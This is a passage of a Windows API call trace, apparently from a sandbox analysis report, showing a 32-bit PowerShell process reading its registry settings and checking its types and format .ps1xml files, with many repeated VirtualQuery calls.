ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0139.866] GetLastError () returned 0x0 [0139.866] SetErrorMode (uMode=0x1) returned 0x1 [0139.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0139.866] GetLastError () returned 0x0 [0139.866] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e348 | out: phkResult=0x24e348*=0x350) returned 0x0 [0139.866] RegQueryValueExW (in: hKey=0x350, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e390, lpData=0x0, lpcbData=0x24e38c*=0x0 | out: lpType=0x24e390*=0x1, lpData=0x0, lpcbData=0x24e38c*=0x56) returned 0x0 [0139.867] RegQueryValueExW (in: hKey=0x350, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e390, lpData=0x338390, lpcbData=0x24e38c*=0x56 | out: lpType=0x24e390*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x24e38c*=0x56) returned 0x0 [0139.867] RegCloseKey (hKey=0x350) returned 0x0 [0139.867] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0139.867] GetLastError () returned 0x0 [0139.867] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x24de84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0139.867] GetLastError () returned 0x0 [0143.783] VirtualQuery (in: lpAddress=0x24d284, lpBuffer=0x24e284, dwLength=0x1c | out: lpBuffer=0x24e284*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.833] VirtualQuery (in: lpAddress=0x24d284, lpBuffer=0x24e284, dwLength=0x1c | out: lpBuffer=0x24e284*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.833] VirtualQuery (in: lpAddress=0x24d284, lpBuffer=0x24e284, dwLength=0x1c | out: lpBuffer=0x24e284*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.834] VirtualQuery (in: lpAddress=0x24d284, lpBuffer=0x24e284, dwLength=0x1c | out: lpBuffer=0x24e284*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.834] VirtualQuery (in: lpAddress=0x24d284, lpBuffer=0x24e284, dwLength=0x1c | out: lpBuffer=0x24e284*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.834] VirtualQuery (in: lpAddress=0x24d284, lpBuffer=0x24e284, dwLength=0x1c | out: lpBuffer=0x24e284*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.835] VirtualQuery (in: lpAddress=0x24d284, lpBuffer=0x24e284, dwLength=0x1c | out: lpBuffer=0x24e284*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.837] VirtualQuery (in: lpAddress=0x24d284, lpBuffer=0x24e284, dwLength=0x1c | out: lpBuffer=0x24e284*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.857] VirtualQuery (in: lpAddress=0x24d284, lpBuffer=0x24e284, dwLength=0x1c | out: lpBuffer=0x24e284*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.857] VirtualQuery (in: lpAddress=0x24d284, lpBuffer=0x24e284, dwLength=0x1c | out: lpBuffer=0x24e284*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.857] VirtualQuery (in: lpAddress=0x24d284, lpBuffer=0x24e284, dwLength=0x1c | out: lpBuffer=0x24e284*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.858] VirtualQuery (in: lpAddress=0x24d284, lpBuffer=0x24e284, dwLength=0x1c | out: lpBuffer=0x24e284*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.858] VirtualQuery (in: lpAddress=0x24d284, lpBuffer=0x24e284, dwLength=0x1c | out: lpBuffer=0x24e284*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.858] VirtualQuery (in: lpAddress=0x24d284, lpBuffer=0x24e284, dwLength=0x1c | out: lpBuffer=0x24e284*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.859] VirtualQuery (in: lpAddress=0x24d284, lpBuffer=0x24e284, dwLength=0x1c | out: lpBuffer=0x24e284*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.859] VirtualQuery (in: lpAddress=0x24d284, lpBuffer=0x24e284, dwLength=0x1c | out: lpBuffer=0x24e284*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.867] VirtualQuery (in: lpAddress=0x24d284, lpBuffer=0x24e284, dwLength=0x1c | out: lpBuffer=0x24e284*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.872] VirtualQuery (in: lpAddress=0x24d284, lpBuffer=0x24e284, dwLength=0x1c | out: lpBuffer=0x24e284*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.872] VirtualQuery (in: lpAddress=0x24d284, lpBuffer=0x24e284, dwLength=0x1c | out: lpBuffer=0x24e284*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.881] VirtualQuery (in: lpAddress=0x24d284, lpBuffer=0x24e284, dwLength=0x1c | out: lpBuffer=0x24e284*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.881] VirtualQuery (in: lpAddress=0x24d284, lpBuffer=0x24e284, dwLength=0x1c | out: lpBuffer=0x24e284*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.882] VirtualQuery (in: lpAddress=0x24d284, lpBuffer=0x24e284, dwLength=0x1c | out: lpBuffer=0x24e284*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.882] VirtualQuery (in: lpAddress=0x24d284, lpBuffer=0x24e284, dwLength=0x1c | out: lpBuffer=0x24e284*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.883] VirtualQuery (in: lpAddress=0x24d284, lpBuffer=0x24e284, dwLength=0x1c | out: lpBuffer=0x24e284*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.883] VirtualQuery (in: lpAddress=0x24d284, lpBuffer=0x24e284, dwLength=0x1c | out: lpBuffer=0x24e284*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.884] VirtualQuery (in: lpAddress=0x24d284, lpBuffer=0x24e284, dwLength=0x1c | out: lpBuffer=0x24e284*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.884] VirtualQuery (in: lpAddress=0x24d284, lpBuffer=0x24e284, dwLength=0x1c | out: lpBuffer=0x24e284*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.884] VirtualQuery (in: lpAddress=0x24d284, lpBuffer=0x24e284, dwLength=0x1c | out: lpBuffer=0x24e284*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.884] VirtualQuery (in: lpAddress=0x24d284, lpBuffer=0x24e284, dwLength=0x1c | out: lpBuffer=0x24e284*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.884] VirtualQuery (in: lpAddress=0x24d284, lpBuffer=0x24e284, dwLength=0x1c | out: lpBuffer=0x24e284*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.886] VirtualQuery (in: lpAddress=0x24d284, lpBuffer=0x24e284, dwLength=0x1c | out: lpBuffer=0x24e284*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.890] VirtualQuery (in: lpAddress=0x24d288, lpBuffer=0x24e288, dwLength=0x1c | out: lpBuffer=0x24e288*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.890] VirtualQuery (in: lpAddress=0x24d288, lpBuffer=0x24e288, dwLength=0x1c | out: lpBuffer=0x24e288*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.890] VirtualQuery (in: lpAddress=0x24d284, lpBuffer=0x24e284, dwLength=0x1c | out: lpBuffer=0x24e284*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0143.892] VirtualQuery (in: lpAddress=0x24d284, lpBuffer=0x24e284, dwLength=0x1c | out: lpBuffer=0x24e284*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.139] VirtualQuery (in: lpAddress=0x24d284, lpBuffer=0x24e284, dwLength=0x1c | out: lpBuffer=0x24e284*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.139] VirtualQuery (in: lpAddress=0x24d284, lpBuffer=0x24e284, dwLength=0x1c | out: lpBuffer=0x24e284*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.139] VirtualQuery (in: lpAddress=0x24d284, lpBuffer=0x24e284, dwLength=0x1c | out: lpBuffer=0x24e284*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.175] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x338390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0144.175] GetLastError () returned 0xcb [0144.206] VirtualQuery (in: lpAddress=0x24d284, lpBuffer=0x24e284, dwLength=0x1c | out: lpBuffer=0x24e284*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.216] VirtualQuery (in: lpAddress=0x24d284, lpBuffer=0x24e284, dwLength=0x1c | out: lpBuffer=0x24e284*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.216] VirtualQuery (in: lpAddress=0x24d284, lpBuffer=0x24e284, dwLength=0x1c | out: lpBuffer=0x24e284*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.217] VirtualQuery (in: lpAddress=0x24d284, lpBuffer=0x24e284, dwLength=0x1c | out: lpBuffer=0x24e284*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.217] VirtualQuery (in: lpAddress=0x24d284, lpBuffer=0x24e284, dwLength=0x1c | out: lpBuffer=0x24e284*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.219] VirtualQuery (in: lpAddress=0x24d284, lpBuffer=0x24e284, dwLength=0x1c | out: lpBuffer=0x24e284*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.219] VirtualQuery (in: lpAddress=0x24d284, lpBuffer=0x24e284, dwLength=0x1c | out: lpBuffer=0x24e284*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.221] VirtualQuery (in: lpAddress=0x24d284, lpBuffer=0x24e284, dwLength=0x1c | out: lpBuffer=0x24e284*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.224] VirtualQuery (in: lpAddress=0x24d284, lpBuffer=0x24e284, dwLength=0x1c | out: lpBuffer=0x24e284*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0144.230] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e40c | out: phkResult=0x24e40c*=0x1e4) returned 0x0 [0144.230] RegQueryValueExW (in: hKey=0x1e4, lpValueName="path", lpReserved=0x0, lpType=0x24e474, lpData=0x0, lpcbData=0x24e470*=0x0 | out: lpType=0x24e474*=0x1, lpData=0x0, lpcbData=0x24e470*=0x74) returned 0x0 [0144.230] RegQueryValueExW (in: hKey=0x1e4, lpValueName="path", lpReserved=0x0, lpType=0x24e454, lpData=0x0, lpcbData=0x24e450*=0x0 | out: lpType=0x24e454*=0x1, lpData=0x0, lpcbData=0x24e450*=0x74) returned 0x0 [0144.230] RegQueryValueExW (in: hKey=0x1e4, lpValueName="path", lpReserved=0x0, lpType=0x24e454, lpData=0x338390, lpcbData=0x24e450*=0x74 | out: lpType=0x24e454*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x24e450*=0x74) returned 0x0 [0144.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x24dfd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0144.231] GetLastError () returned 0xcb [0144.231] SetErrorMode (uMode=0x1) returned 0x1 [0144.231] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x24e454 | out: lpFileInformation=0x24e454*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0144.231] GetLastError () returned 0xcb [0144.231] SetErrorMode (uMode=0x1) returned 0x1 [0144.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24dfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0144.234] GetLastError () returned 0xcb [0144.234] SetErrorMode (uMode=0x1) returned 0x1 [0144.234] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24e448 | out: lpFileInformation=0x24e448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0144.234] GetLastError () returned 0xcb [0144.234] SetErrorMode (uMode=0x1) returned 0x1 [0144.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24dfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0144.234] GetLastError () returned 0xcb [0144.234] SetErrorMode (uMode=0x1) returned 0x1 [0144.234] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24e448 | out: lpFileInformation=0x24e448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1f4ab5, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1f4ab5, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd374b67c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0144.234] GetLastError () returned 0xcb [0144.234] SetErrorMode (uMode=0x1) returned 0x1 [0144.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24dfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0144.234] GetLastError () returned 0xcb [0144.234] SetErrorMode (uMode=0x1) returned 0x1 [0144.234] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24e448 | out: lpFileInformation=0x24e448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0144.235] GetLastError () returned 0xcb [0144.235] SetErrorMode (uMode=0x1) returned 0x1 [0144.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24dfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0144.235] GetLastError () returned 0xcb [0144.235] SetErrorMode (uMode=0x1) returned 0x1 [0144.235] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24e448 | out: lpFileInformation=0x24e448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0144.235] GetLastError () returned 0xcb [0144.235] SetErrorMode (uMode=0x1) returned 0x1 [0144.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24dfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0144.235] GetLastError () returned 0xcb [0144.235] SetErrorMode (uMode=0x1) returned 0x1 [0144.236] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24e448 | out: lpFileInformation=0x24e448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0144.236] GetLastError () returned 0xcb [0144.236] SetErrorMode (uMode=0x1) returned 0x1 [0144.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24dfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0144.236] GetLastError () returned 0xcb [0144.236] SetErrorMode (uMode=0x1) returned 0x1 [0144.236] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24e448 | out: lpFileInformation=0x24e448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0144.236] GetLastError () returned 0xcb [0144.236] SetErrorMode (uMode=0x1) returned 0x1 [0144.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24dfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0144.236] GetLastError () returned 0xcb [0144.236] SetErrorMode (uMode=0x1) returned 0x1 [0144.237] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24e448 | out: lpFileInformation=0x24e448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a182698, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a182698, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd368cf9c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1 [0144.237] GetLastError () returned 0xcb [0144.237] SetErrorMode (uMode=0x1) returned 0x1 [0144.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24dfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0144.237] GetLastError () returned 0xcb [0144.237] SetErrorMode (uMode=0x1) returned 0x1 [0144.237] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24e448 | out: lpFileInformation=0x24e448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1a87f7, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1a87f7, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd36b30fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1 [0144.237] GetLastError () returned 0xcb [0144.237] SetErrorMode (uMode=0x1) returned 0x1 [0144.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24dfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0144.237] GetLastError () returned 0xcb [0144.237] SetErrorMode (uMode=0x1) returned 0x1 [0144.237] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: 